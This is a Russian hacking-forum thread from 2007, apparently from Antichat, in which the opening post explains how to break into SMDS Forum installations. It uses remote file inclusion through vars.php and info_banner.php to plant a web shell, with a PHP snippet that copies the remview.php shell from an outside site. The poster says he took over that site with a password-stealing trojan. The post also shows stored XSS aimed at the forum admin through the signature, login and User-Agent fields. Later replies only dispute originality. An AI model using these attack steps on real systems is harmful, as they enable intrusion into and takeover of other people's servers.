Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
заливка шелла в SMDS Forum |
17.09.2007, 02:20
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
заливка шелла в SMDS Forum
Нашёл статейку интересную про уязвимость в этом (SMDS), хоть и мало используемом, форуме. Дырка находится в файле vars.php и позволяет без труда загрузить шелл, если на сервере разрешён инклуд URL. Для начала - ищем нашу жертву. Нашли? Читаем дальше.
Проверяем на предмет разрешения доступа к файлу vars.php - заходим по ссылке адрес_форума/vars.php. Естественно, если доступ закрыт - будет ошибка 403. А если открыт - куча ошибок PHP.
Среди них - одна ВАЖНАЯ:
Warning: include() [function.include]: Failed opening '' for inclusion (include_path='.;C:\php5\pear') in C:\AppServ\www\forum\vars.php on line 110
Берём исходник скрипта и видим строку (кому лень искать исходник - говорю, что она там ЕСТЬ ):
include "$file_directories";
При этом эта переменная нигде выше не задаётся в этом файле.
Заходим по ссылке адрес_форума/vars.php?file_directories=URL_до_скрипта
По заданной URL для удобства должен находиться файл РНР (сразу говорю - хостинг НЕ должен поддерживать РНР!) вида:
PHP код:
PHP код:
<?php
copy ("http://deathteam.clan.su/remview.php","remview.php");
//Копируем шелл (задайте ссылку. По той ссылке - шелл REMVIEW.
//Сайт не мой, а друга.
//Я его взломал - трояном пароль угнал и залил туда шелл специально для таких вещей.
//Сайт на Укозе - нет поддержки РНР. То что нам и надо.)
?>
Всё. Если доступ к файлу vars.php закрыт - пробуем то же самое с файлом info_banner.php.
Только на этот раз - с переменной $file_read_statistic. Думаю, понятно.
Если и к этому файлу закрыт доступ - можно просто наделать гадостей админу форума...
Берём и регистрируемся на форуме, а в подписи пишем
</textarea>
<script language="JavaScript">
Наш скрипт...
</script>
И начинаем постить фигню на форуме, чтоб вынудить админа залезть в админку и удалить этого юзера. Как только он зайдёт туда - скрипт заработает. Или при авторизации написать скрипт в поле "Логин" - только кодировать его надо так, чтоб не было кавычек. Они там вырезаются. Этот скрипт сработает, если админ полезет смотреть логи удачных/неудачных авторизаций на форуме. Если нет - пишем скрипт строке User-Agent в Фаерфоксе и лазим им по форуму (изменить можно зайдя по адресу about :config). Тогда скрипт сработает при просмотре логов входа на главную.
Вот такая вот фигня. (Написал, потому что многие этого не знают и пишут мне с вопросами типа "как сломать СМДС форум?". Понимаю, что им почти не пользуются, но мало ли...)
(С)Eu_gen2007 |
|
|
19.09.2007, 02:43
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
видео к статье.. правда там чуть проще всё.. уже моё.
http://video.antichat.ru/files/smds_forum_remote_include.rar
|
|
|
|
19.09.2007, 20:20
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406
Репутация:
271
|
|
ни 1 коммента.. ни 1 отзыва
Молодец!+1!
|
|
|
|
19.09.2007, 20:29
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
спасибо большое  |
|
|
|
19.09.2007, 21:00
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Я тебе поражаюсь, ты себя гером возомнил?
Судя по этому:
Код:
Нашёл статейку интересную
(С)Eu_gen2007
Ты всего лишь сделал описание инклуда, но за чем? что мало статей?
Да и еще:
Код:
ни 1 коммента.. ни 1 отзыва
Опять же, а что ты такого сделал что бы тут было 100 страниц с коментами "ооо вот это да", "оо супер", "ээ лови плюсег"? нашел уязвимости? нет. Просто сделал никому не нужное описание.
Смотри вот инклуд файлов:
https://forum.antichat.ru/showpost.p...55&postcount=1
Дата поста: 01.09.2007, 16:58
Заливка шелла (инклуд и пассивные xss там тоже есть) описывалась здесь:
https://forum.antichat.ru/showpost.p...2&postcount=20
Дата поста: 14.06.2007, 16:59
И теперь Дата Твоего поста: 17.09.2007, 01:20
Так всё таки что ты такого сделал?
Только честно ты думаешь можно взять уже найденную уязвимость, запостить её снова прикрутив к ней описание для даунов, и найти в добавок пару мелких багов Запостить всё это в отдельную тему и ещё написать "ну где же отзывы"?
Последний раз редактировалось Grey; 20.09.2007 в 20:15..
|
|
|
|
19.09.2007, 21:08
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
я не ждал восторгов, я ждал вопросов, либо др комментов!
+ я снял видео, что тебе ненравица я непонимаю, что ты понты кидаеш типа ты гуру хакинга? да мб ты и шариш, но не все же, гугу на ачате меньшенство, и хватит уже из себя строить непонятно кого =\
====
ты мне ещё темы на ачате запрети создавать? ты мне никто! и не указывай мне что делать! мои действия вписываются в правила!
|
|
|
|
19.09.2007, 21:12
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от BlackCats
я не ждал восторгов, я ждал вопросов, либо др комментов!
+ я снял видео, что тебе ненравица я непонимаю, что ты понты кидаеш типа ты гуру хакинга? да мб ты и шариш, но не все же, гугу на ачате меньшенство, и хватит уже из себя строить непонятно кого =\
Я из себя никого не строю, объясни нахер нужно брать уже найденные уязвимости причем мягко говоря к далеко не самому популярному форумному движку, и делать к ним описание? для этого нет отдельной темы? ну снял ты видео, но ведь это и так все было? А твои коменты, тебя самого не тошнит? на каждый положительный отзыв ты отвечашь "Спасибо" (потом ты удаляешь этот пост и отвечаешь так же на следующий), ты это ради комментов делаешь?
|
|
|
|
19.09.2007, 21:15
|
|
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441
Репутация:
161
|
|
в таком случае следовало бі прописать в правилах, что уязвимости выкладивать только с серверов microsoft.com,nasa.go.ua,php.net и тд...
|
|
|
|
19.09.2007, 21:17
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от Y.Dmitriy
в таком случае следовало бі прописать в правилах, что уязвимости выкладивать только с серверов microsoft.com,nasa.go.ua,php.net и тд...
Для одарённых, смотрим правила раздела Уязвимости:
Код:
4. Можно создавать отдельную тему о новой уязвимости, если ВЫ нашли эту УЯЗВИМОСТЬ. Но здесь вам не секлаб или милворм.Не надо копипастить сюда баги. Эти темы будут удалены и поставлен минус.
http://forum.antichat.ru/thread18883.html
|
|
|
|
19.09.2007, 21:20
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047
Репутация:
930
|
|
Ты так и не научился искать уязвимости сам.
 |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
